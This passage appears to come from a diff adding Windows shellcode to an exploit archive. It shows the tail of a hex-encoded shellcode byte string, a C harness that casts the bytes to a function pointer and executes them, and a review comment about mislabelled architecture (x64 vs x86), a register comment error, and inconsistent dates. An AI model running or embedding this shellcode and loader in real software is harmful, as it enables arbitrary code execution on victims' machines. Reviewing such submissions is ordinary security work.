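+"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0";
+int main(int argc, char **argv)
+{
+int (*func)();
+func = (int(*)()) code;
+(int)(*func)();
+}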
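Review bot: The title and the index row describe this as Windows\x64 shellcode, but the listing is 32-bit throughout — `push ebp`/`mov ebp, esp`, the PEB fetched through `fs:[ebx+0x30]`, 32-bit `call eax` — and a 64-bit process reaches the PEB through `gs:` at a different offset, so the x64 label looks wrong and should read x86; if the `x86_64` tests in `# Tested On` were done inside 32-bit WoW64 processes, saying so would resolve the apparent contradiction. The comment on `mov byte bl, [esp+0xA]` reads `DL = 'A' or 'W'` while the load is into BL, which is the register `cmp bl, 0x41` tests later; change it to `BL = 'A' or 'W'`. In the harness, `(int)(*func)();` casts a result that is then discarded; `return func();` would be clearer and gives `main` an explicit return. `# Date: March 2020-03-17` mixes two date formats, and the index entry uses `2020-03-18`.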